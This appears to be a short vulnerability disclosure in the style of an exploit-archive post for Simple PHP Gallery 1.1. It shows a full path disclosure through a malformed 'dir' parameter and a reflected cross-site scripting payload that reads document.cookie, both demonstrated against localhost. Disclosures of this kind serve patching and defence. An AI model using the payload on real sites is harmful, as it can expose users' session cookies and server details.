Cross site scripting & fullpath disclosure

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

•                                                                             ;;ii,,::            
  

•                                             ::::            ::              ;;tt;;::            
  

•                                             ;;::          ..,,::            ;;ii,,::            
  

•                       ,,,,                ii;;,,          ii;;::            ;;ii,,::            
  

•                       ii::                tt;;,,        ..tt;;,,..          ;;ii;;::            
  

•                     ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::            
  

•                     tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::            
  

•                     tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::            
  

•                     tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::            
  

•                 ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::            
  

•             ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::            
  

•           ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::            
  

•         ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::            
  

•       ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..            
  

•     ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..            
  

•   ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..            
  

•   tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..            
  

•   jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..            
  

•   ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..            
  

•       ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..            
  

•                   iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;              
  

•                   ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,              
  

•                     jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,              
  

•                       jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::              
  

•                         iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii                
  

•                                                       ;;..                  ii;;                
  

•                                                                             ..                  
  

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+Script : Simple PHP Gallery 1.1
+Impact : Cross site scripting & fullpath disclosure
+
+
+Fullpath disclosure :
+
+http://localhost/sp_index.php?dir=[Somthingwrong]
+
+Result
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in
/var/www/html/gallery/sp_helper_functions.php on line 10 +
+
+Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/gallery/sp_helper_functions.php on line 11 +
+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+Cross Site Scripting
+
+
+
+dir variable is not probrely verified and can be used to execute html and javascript code
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+/Milw0rm
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++